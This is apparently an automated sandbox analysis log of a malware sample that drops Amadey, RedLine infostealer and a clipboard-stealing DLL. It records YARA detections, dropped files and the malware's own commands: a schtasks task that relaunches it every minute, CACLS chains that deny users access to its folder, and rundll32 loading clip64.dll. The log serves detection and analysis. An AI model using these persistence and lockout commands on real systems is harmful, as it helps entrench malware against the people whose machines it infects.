                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004016502_2_00401650
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00402F202_2_00402F20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004193C42_2_004193C4
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004187882_2_00418788
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00402F892_2_00402F89
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00402B902_2_00402B90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004073A02_2_004073A0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_02520DB02_2_02520DB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0122853014_2_01228530
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0122754D14_2_0122754D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01206F4014_2_01206F40
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 2.3.aPsf.exe.690000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.2.aPsf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.2.aPsf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.2.aPsf.exe.660e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 00000002.00000002.292530050.00000000006F7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: Process Memory Space: mnolyk.exe PID: 5764, type: MEMORYSTRMatched rule: webshell_php_encoded_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using some kind of eval with encoded blob to decode, score = 1d4b374d284c12db881ba42ee63ebce2759e0b14, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_003D1F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F31F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00F31F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01215E20 appears 130 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 01217CE0 appears 40 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: String function: 0040E1D8 appears 44 times
                              Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 381698 bytes, 2 files, at 0x2c +A "bPsg.exe" +A "xriv.exe", ID 1589, number 1, 18 datablocks, 0x1503 compression
                              Source: bPsg.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 190378 bytes, 2 files, at 0x2c +A "aPsf.exe" +A "nika.exe", ID 1549, number 1, 9 datablocks, 0x1503 compression
                              Source: file.exe, 00000000.00000003.254673704.0000000004709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aPsf.exe.logJump to behavior
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@37/14@0/1
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_003D597D
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeCode function: 7_2_00007FFDC87B1B10 ChangeServiceConfigA,7_2_00007FFDC87B1B10
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_003D4FE0
                              Source: file.exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\bPsg.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\aPsf.exe
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\bPsg.exeJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\aPsf.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_003D1F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F31F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00F31F90
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMPJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_003D597D
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_01
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_01
                              Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_003D2BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCommand line argument: Kernel32.dll1_2_00F32BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCommand line argument: 08A2_2_00413780
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: wextract.pdb source: file.exe, bPsg.exe.0.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.254759313.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.254673704.0000000004709000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 0000000E.00000000.319981682.000000000122E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 0000000F.00000000.321061276.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000F.00000002.776375932.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000017.00000000.324442770.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000017.00000002.331617769.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000000.454992434.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000002.455530364.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000020.00000000.583556891.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000020.00000002.583854303.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000021.00000002.713071373.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000021.00000000.712358400.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.14.dr, xriv.exe.0.dr
                              Source: Binary string: Healer.pdb source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293843993.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: wextract.pdbGCTL source: file.exe, bPsg.exe.0.dr
                              Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bPsg.exe, 00000001.00000003.255402987.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, bPsg.exe, 00000001.00000003.255338525.0000000004723000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.294247979.0000000000D42000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                              Source: Binary string: _.pdb source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\yoxici.pdb source: bPsg.exe, 00000001.00000003.255338525.00000000046E6000.00000004.00000020.00020000.00000000.sdmp, aPsf.exe, 00000002.00000000.255496089.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aPsf.exe.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.776435922.000000006EC2F000.00000002.00000001.01000000.0000000C.sdmp, clip64[1].dll.15.dr, clip64.dll.15.dr
                              Source: Binary string: Healer.pdbH5 source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293843993.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeUnpacked PE file: 2.2.aPsf.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeUnpacked PE file: 2.2.aPsf.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D724D push ecx; ret 0_2_003D7260
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F3724D push ecx; ret 1_2_00F37260
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_0252454E push ecx; retf 2_2_02524554
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeCode function: 2_2_02524139 push edi; iretd 2_2_0252414E
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0120F748 push E8FFFFFBh; iretd 14_2_0120F74D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_01217D26 push ecx; ret 14_2_01217D39
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_003D202A
                              Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]

                              Persistence and Installation Behavior

                              barindex
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 6136, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_003D1AE8
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F31AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00F31AE8

                              Boot Survival

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
